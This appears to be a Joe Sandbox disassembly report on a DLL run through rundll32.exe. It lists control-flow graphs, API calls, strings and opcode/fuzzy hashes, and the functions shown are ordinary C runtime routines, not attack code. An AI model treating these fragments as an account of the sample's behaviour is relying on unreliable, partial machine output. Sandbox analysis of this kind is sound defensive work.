                                                                • Opcode ID: 60e546477583f6a47f5a6559fb70d902c250ccded5a2ac8741081b6580a820b2
                                                                • Instruction ID: 10841c0c05855900f84106b1dc7abf5e069492c214d2514c7470d8bf96061a55
                                                                • Opcode Fuzzy Hash: 60e546477583f6a47f5a6559fb70d902c250ccded5a2ac8741081b6580a820b2
                                                                • Instruction Fuzzy Hash: 1A3161716047099FEB116E35DB44B8673E9EF01358FA4581AE0A5D7A90DF31FA74C710

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 491 6c0582c0-6c0582eb call 6c05922d 494 6c058664-6c058669 call 6c05adfe 491->494 495 6c0582f1-6c0582f4 491->495 495->494 496 6c0582fa-6c058303 495->496 498 6c058400-6c058406 496->498 499 6c058309-6c05830d 496->499 502 6c05840e-6c05841c 498->502 499->498 501 6c058313-6c05831a 499->501 503 6c058332-6c058337 501->503 504 6c05831c-6c058323 501->504 505 6c058422-6c058426 502->505 506 6c0585cd-6c0585d0 502->506 503->498 510 6c05833d-6c058345 call 6c057f7b 503->510 504->503 507 6c058325-6c05832c 504->507 505->506 511 6c05842c-6c058433 505->511 508 6c0585f3-6c0585fc call 6c057f7b 506->508 509 6c0585d2-6c0585d5 506->509 507->498 507->503 508->494 523 6c0585fe-6c058602 508->523 509->494 513 6c0585db-6c0585f0 call 6c05866a 509->513 510->523 528 6c05834b-6c058364 call 6c057f7b * 2 510->528 515 6c058435-6c05843c 511->515 516 6c05844b-6c058451 511->516 513->508 515->516 517 6c05843e-6c058445 515->517 519 6c058457-6c05847e call 6c05752f 516->519 520 6c058569-6c05856d 516->520 517->506 517->516 519->520 534 6c058484-6c058487 519->534 525 6c05856f-6c058578 call 6c0578e5 520->525 526 6c058579-6c058585 520->526 525->526 526->508 532 6c058587-6c05858b 526->532 528->494 549 6c05836a-6c058370 528->549 536 6c05859d-6c0585a5 532->536 537 6c05858d-6c058595 532->537 541 6c05848a-6c05849f 534->541 538 6c0585a7-6c0585ba call 6c057f7b * 2 536->538 539 6c0585bc-6c0585c9 call 6c058ccf 536->539 537->508 542 6c058597-6c05859b 537->542 564 6c058603 call 6c05adc2 538->564 556 6c058628-6c05863d call 6c057f7b * 2 539->556 557 6c0585cb 539->557 546 6c0584a5-6c0584a8 541->546 547 6c05854a-6c05855d 541->547 542->508 542->536 546->547 552 6c0584ae-6c0584b6 546->552 547->541 550 6c058563-6c058566 547->550 554 6c058372-6c058376 549->554 555 6c05839c-6c0583a4 call 6c057f7b 549->555 550->520 552->547 558 6c0584bc-6c0584d0 552->558 554->555 560 6c058378-6c05837f 554->560 575 6c0583a6-6c0583c6 call 6c057f7b * 2 call 6c058ccf 555->575 576 6c058408-6c05840b 555->576 583 6c058642-6c05865f call 6c057722 call 6c058bcf call 6c058d8c call 6c058b46 556->583 584 6c05863f 556->584 557->508 561 6c0584d3-6c0584e3 558->561 565 6c058381-6c058388 560->565 566 6c058393-6c058396 560->566 567 6c0584e5-6c0584f8 call 6c0587a0 561->567 568 6c05850b-6c058518 561->568 579 6c058608-6c058623 call 6c0578e5 call 6c05894b call 6c057b0e 564->579 565->566 573 6c05838a-6c058391 565->573 566->494 566->555 586 6c05851c-6c058544 call 6c058240 567->586 587 6c0584fa-6c058500 567->587 568->561 571 6c05851a 568->571 578 6c058547 571->578 573->555 573->566 575->576 604 6c0583c8-6c0583cd 575->604 576->502 578->547 579->556 583->494 584->583 586->578 587->567 593 6c058502-6c058508 587->593 593->568 604->564 606 6c0583d3-6c0583e6 call 6c058963 604->606 606->579 611 6c0583ec-6c0583f8 606->611 611->564 612 6c0583fe 611->612 612->606
                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6C0583BD
                                                                • type_info::operator==.LIBVCRUNTIME ref: 6C0583DF
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6C0584EE
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6C0585C0
                                                                • _UnwindNestedFrames.LIBCMT ref: 6C058644
                                                                • CallUnexpected.LIBVCRUNTIME ref: 6C05865F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 2123188842-393685449
                                                                • Opcode ID: 35a48633a2db8d5f02f497e739a6e476cfb0d8e5d7a6fe4e1a3ab27897c4a337
                                                                • Instruction ID: 89de76987aae5df4f610aed35adaceb06512dc55b00f075851d79ce407a7eb3f
                                                                • Opcode Fuzzy Hash: 35a48633a2db8d5f02f497e739a6e476cfb0d8e5d7a6fe4e1a3ab27897c4a337
                                                                • Instruction Fuzzy Hash: 67B18B71861209DFCF05CFA5CA80A9EBBF5FF04318B94425AEC116BA15D331EA62CF91

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 28ba4f15bc1d4b25d6db99ee8f6395d3e2d68f0411b8dd74a14b8c903cb14301
                                                                • Instruction ID: 4a79ccf8d87a1cb5af313039b0f5c153d5d7d5b11384042e33a68e9a6b49f263
                                                                • Opcode Fuzzy Hash: 28ba4f15bc1d4b25d6db99ee8f6395d3e2d68f0411b8dd74a14b8c903cb14301
                                                                • Instruction Fuzzy Hash: D02197B690450CAFCB41EF94C984EDE7BF9BF08244F4141A6E5559B621DB31FB58CB80

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 640 6c05f25c-6c05f2d4 GetConsoleOutputCP call 6c059c9c 643 6c05f5df 640->643 644 6c05f2da-6c05f2ff 640->644 645 6c05f5e2 643->645 646 6c05f305-6c05f30f 644->646 647 6c05f438-6c05f43f 644->647 650 6c05f5e4-6c05f5e7 645->650 651 6c05f5ee-6c05f607 call 6c056791 645->651 652 6c05f312-6c05f315 646->652 648 6c05f441-6c05f45d 647->648 649 6c05f45f-6c05f471 call 6c05b51e 647->649 653 6c05f4a2-6c05f4b1 call 6c05dd32 648->653 665 6c05f473-6c05f47c 649->665 666 6c05f49f-6c05f4a1 649->666 650->651 656 6c05f317-6c05f31b 652->656 657 6c05f31d-6c05f327 652->657 653->643 670 6c05f4b7-6c05f4db call 6c05cc09 653->670 656->652 656->657 661 6c05f32d-6c05f348 657->661 662 6c05f3de-6c05f3ee 657->662 663 6c05f55e-6c05f560 661->663 664 6c05f34e-6c05f353 661->664 667 6c05f3f4-6c05f42a call 6c05fe8a 662->667 668 6c05f592-6c05f594 662->668 672 6c05f587 663->672 676 6c05f562 663->676 671 6c05f356-6c05f360 664->671 674 6c05f5b3-6c05f5d4 665->674 675 6c05f482-6c05f494 call 6c05dd32 665->675 666->653 667->643 685 6c05f430 667->685 668->672 673 6c05f596 668->673 670->643 693 6c05f4e1-6c05f4f6 WriteFile 670->693 671->671 680 6c05f362-6c05f36a 671->680 678 6c05f589-6c05f590 672->678 681 6c05f599-6c05f5af 673->681 674->678 675->643 696 6c05f49a-6c05f49d 675->696 683 6c05f564-6c05f582 676->683 678->645 687 6c05f382-6c05f385 680->687 688 6c05f36c-6c05f37f call 6c059260 680->688 681->681 689 6c05f5b1 681->689 683->683 691 6c05f584 683->691 692 6c05f433-6c05f436 685->692 695 6c05f387-6c05f397 687->695 688->687 689->691 691->672 692->670 697 6c05f5d6-6c05f5dc GetLastError 693->697 698 6c05f4fc-6c05f50d 693->698 695->695 700 6c05f399-6c05f3d6 call 6c05fe8a 695->700 696->670 697->643 698->643 701 6c05f513-6c05f517 698->701 700->643 708 6c05f3dc 700->708 703 6c05f54d-6c05f550 701->703 704 6c05f519-6c05f536 WriteFile 701->704 703->643 707 6c05f556-6c05f559 703->707 704->697 706 6c05f53c-6c05f540 704->706 706->643 709 6c05f546-6c05f54a 706->709 707->644 708->692 709->703
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6C05F2A4
                                                                • __fassign.LIBCMT ref: 6C05F489
                                                                • __fassign.LIBCMT ref: 6C05F4A6
                                                                • WriteFile.KERNEL32(?,6C05D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C05F4EE
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C05F52E
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C05F5D6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                • String ID: NKxo
                                                                • API String ID: 1735259414-1440849049
                                                                • Opcode ID: 1756e46eca4a80d17d058a9eb495a5905c5588e79ccbd7b339931493f3203ed2
                                                                • Instruction ID: ae6fd99980a85a14b7318ecfc8c6dcb2257c4fd6a3bd92ed52b2c9ea059b1c1b
                                                                • Opcode Fuzzy Hash: 1756e46eca4a80d17d058a9eb495a5905c5588e79ccbd7b339931493f3203ed2
                                                                • Instruction Fuzzy Hash: 99C1BE71D052588FCF00CFA8C980AEDBBF9AF09314F68416AE855F7741D635AA16CF50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 771 6c057c10-6c057c61 call 6c062260 call 6c057bd0 call 6c058dec 778 6c057c63-6c057c75 771->778 779 6c057cbd-6c057cc0 771->779 780 6c057ce0-6c057ce9 778->780 782 6c057c77-6c057c8e 778->782 779->780 781 6c057cc2-6c057ccf call 6c058fe0 779->781 786 6c057cd4-6c057cdd call 6c057bd0 781->786 784 6c057ca4 782->784 785 6c057c90-6c057c9e call 6c058f80 782->785 788 6c057ca7-6c057cac 784->788 794 6c057cb4-6c057cbb 785->794 795 6c057ca0 785->795 786->780 788->782 791 6c057cae-6c057cb0 788->791 791->780 792 6c057cb2 791->792 792->786 794->786 796 6c057ca2 795->796 797 6c057cea-6c057cf3 795->797 796->788 798 6c057cf5-6c057cfc 797->798 799 6c057d2d-6c057d3d call 6c058fc0 797->799 798->799 801 6c057cfe-6c057d0d call 6c0620d0 798->801 804 6c057d51-6c057d6f call 6c057bd0 call 6c058fa0 799->804 805 6c057d3f-6c057d4e call 6c058fe0 799->805 809 6c057d0f-6c057d27 801->809 810 6c057d2a 801->810 805->804 809->810 810->799
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 6C057C47
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6C057C4F
                                                                • _ValidateLocalCookies.LIBCMT ref: 6C057CD8
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6C057D03
                                                                • _ValidateLocalCookies.LIBCMT ref: 6C057D58
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: NKxo$csm
                                                                • API String ID: 1170836740-3529511991
                                                                • Opcode ID: c24e4de6dd0c11554c692ad67df8cec8a7fdd28de7a4c8742048d61afb824e1f
                                                                • Instruction ID: 9228a8e05f12e51ed0e51fd32d516e5e684d883104f025b40e19a6112b2a04c7
                                                                • Opcode Fuzzy Hash: c24e4de6dd0c11554c692ad67df8cec8a7fdd28de7a4c8742048d61afb824e1f
                                                                • Instruction Fuzzy Hash: BE41A234A102189BCF10CF6DC944B9E7BF5BF45318F90C199EC189BB51D732AA65CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: 5122906abe263107e5f716cc2f77052e1e8382607f90bffbe786ee678f1005da
                                                                • Instruction ID: 702a23165547357fc031e2f5f0e74b90752aac1898af76859f3713736955183e
                                                                • Opcode Fuzzy Hash: 5122906abe263107e5f716cc2f77052e1e8382607f90bffbe786ee678f1005da
                                                                • Instruction Fuzzy Hash: 2E21EE72B45210B7DB11AE6A8E40B5B37F89F0A7A4FB50514E855E7A80D731ED10C6E0
                                                                APIs
                                                                  • Part of subcall function 6C05E397: _free.LIBCMT ref: 6C05E3BC
                                                                • _free.LIBCMT ref: 6C05E41D
                                                                  • Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
                                                                  • Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937
                                                                • _free.LIBCMT ref: 6C05E428
                                                                • _free.LIBCMT ref: 6C05E433
                                                                • _free.LIBCMT ref: 6C05E487
                                                                • _free.LIBCMT ref: 6C05E492
                                                                • _free.LIBCMT ref: 6C05E49D
                                                                • _free.LIBCMT ref: 6C05E4A8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                                                                • Instruction ID: fb6e2cb3438e71cbef368ceaeadc540d5c186cb5cd8373d3d940bb4fd45f76fe
                                                                • Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
                                                                • Instruction Fuzzy Hash: 6711E272544F0CA7D620AF70CE49FCB7FDC5F04704F804819A2E9A7B91D7A9F6284694
                                                                APIs
                                                                • GetLastError.KERNEL32(00000001,?,6C057B9E,6C0568B4,6C056D4B,?,6C056F85,?,00000001,?,?,00000001,?,6C06C7F8,0000000C,6C05707E), ref: 6C057F97
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C057FA5
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C057FBE
                                                                • SetLastError.KERNEL32(00000000,6C056F85,?,00000001,?,?,00000001,?,6C06C7F8,0000000C,6C05707E,?,00000001,?), ref: 6C058010
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: c436e1827c46706972d547a0cdd4fc9fe3ff80abef4a87d82d238063945f9f2d
                                                                • Instruction ID: 882dc6b0aef55ec3cd6c58fb5fa9fb90a1a1ddb2a6c073649d839f1665261d59
                                                                • Opcode Fuzzy Hash: c436e1827c46706972d547a0cdd4fc9fe3ff80abef4a87d82d238063945f9f2d
                                                                • Instruction Fuzzy Hash: 91012D7235D3216FBA1119BA5E887A737E8D74277D3A0072AF570869D0EF125836B290
                                                                Strings
                                                                • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6C05C180
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                • API String ID: 0-2837366778
                                                                • Opcode ID: 1c6b6f2989f685d138422c71c55d54b46b58d8f7dc046ddf45b6f907ce392570
                                                                • Instruction ID: 1d1e7c2d131434a217d9041e03493cd7238d5cdb3f1fee0936d489dc2ee19d61
                                                                • Opcode Fuzzy Hash: 1c6b6f2989f685d138422c71c55d54b46b58d8f7dc046ddf45b6f907ce392570
                                                                • Instruction Fuzzy Hash: 1521C571204105AF9B10AEA68E80F5B77ECAF0976C7944615F924D7A80EB34EC3087A0
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,6C0590B8,00000000,?,00000001,00000000,?,6C05912F,00000001,FlsFree,6C066E3C,FlsFree,00000000), ref: 6C059087
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-
                                                                • API String ID: 3664257935-2084034818
                                                                • Opcode ID: 58a50e94a476bf201b931ee8d8df2d6e2c4d0284213e051e4eb1edde42342b24
                                                                • Instruction ID: f38f8cebe31bcfafae358f61738748be24c080078cc46010d88fd1d517adc2e9
                                                                • Opcode Fuzzy Hash: 58a50e94a476bf201b931ee8d8df2d6e2c4d0284213e051e4eb1edde42342b24
                                                                • Instruction Fuzzy Hash: 0011CAB1B45120AFDF124FA9CD4475E33F4AF037B4F650620E951E7680DB72E91186E1
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C05A28B,?,?,6C05A253,?,00000001,?), ref: 6C05A2EE
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C05A301
                                                                • FreeLibrary.KERNEL32(00000000,?,?,6C05A28B,?,?,6C05A253,?,00000001,?), ref: 6C05A324
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 484a5793d03a4e14712f3b04c83c838e0641d3fe950af2e710f105f5a6e9796e
                                                                • Instruction ID: 916c8870500a69b4d08124208aa1d05913f3cd96b59e7b9aceaf3e954edab786
                                                                • Opcode Fuzzy Hash: 484a5793d03a4e14712f3b04c83c838e0641d3fe950af2e710f105f5a6e9796e
                                                                • Instruction Fuzzy Hash: E4F03031A16618FBEF019F92DD09BAE7AF9EF4175AF604064F405E2551CF328E10DBA1
                                                                APIs
                                                                • _free.LIBCMT ref: 6C05E346
                                                                  • Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
                                                                  • Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937
                                                                • _free.LIBCMT ref: 6C05E358
                                                                • _free.LIBCMT ref: 6C05E36A
                                                                • _free.LIBCMT ref: 6C05E37C
                                                                • _free.LIBCMT ref: 6C05E38E
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7e5b10e4b8f23e8370db3420bcd510076d0f0375c50b2966e941a33bc3a0d888
                                                                • Instruction ID: ee9ebdc6f2525ede5dd48b2e7ecf040729fc94b167d8a40db1a8a12881d759e3
                                                                • Opcode Fuzzy Hash: 7e5b10e4b8f23e8370db3420bcd510076d0f0375c50b2966e941a33bc3a0d888
                                                                • Instruction Fuzzy Hash: AFF0FF7150970C57CB10EE59E6C9F5A77EDAB017587E42805F074D7B40CB34FAA08AD4
                                                                APIs
                                                                • __freea.LIBCMT ref: 6C05ED0A
                                                                  • Part of subcall function 6C05B833: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6C05C6BF,00000220,6C05F2B8,00013385,?,?,?,?,00000000,00000000,?,6C05F2B8), ref: 6C05B865
                                                                • __freea.LIBCMT ref: 6C05ED13
                                                                • __freea.LIBCMT ref: 6C05ED36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: __freea$AllocHeap
                                                                • String ID: NKxo
                                                                • API String ID: 85559729-1440849049
                                                                • Opcode ID: 6edbc78a1c6e7392122ff51add9e9a6e00d717d9a3ec8e2623f9de8ee366c55c
                                                                • Instruction ID: 31d630c1664595b2f86292198acb4f71758b08751181635c212e0d357b307a5b
                                                                • Opcode Fuzzy Hash: 6edbc78a1c6e7392122ff51add9e9a6e00d717d9a3ec8e2623f9de8ee366c55c
                                                                • Instruction Fuzzy Hash: D951D172600216ABEF144E658E44FAB3AE9EB44718FA50529FD6497A40E739EC2186E0
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C05C2A2
                                                                • GetLastError.KERNEL32 ref: 6C05C2AC
                                                                • __dosmaperr.LIBCMT ref: 6C05C2B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastModuleName__dosmaperr
                                                                • String ID: NKxo
                                                                • API String ID: 4076908705-1440849049
                                                                • Opcode ID: 70ef6246e64ce7519a92704dc2a85a8320d5e0cd3bf1f54ab2c6e47ad903420b
                                                                • Instruction ID: ce98aab6f86e591e16134a6444aa1940e9f40b03b6c84ebb3e81165c9dde1c23
                                                                • Opcode Fuzzy Hash: 70ef6246e64ce7519a92704dc2a85a8320d5e0cd3bf1f54ab2c6e47ad903420b
                                                                • Instruction Fuzzy Hash: BD111BB194421CAFDF10DFA5DD88BDE77F8AB08304F504599E509E7240DB74AA988F54
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
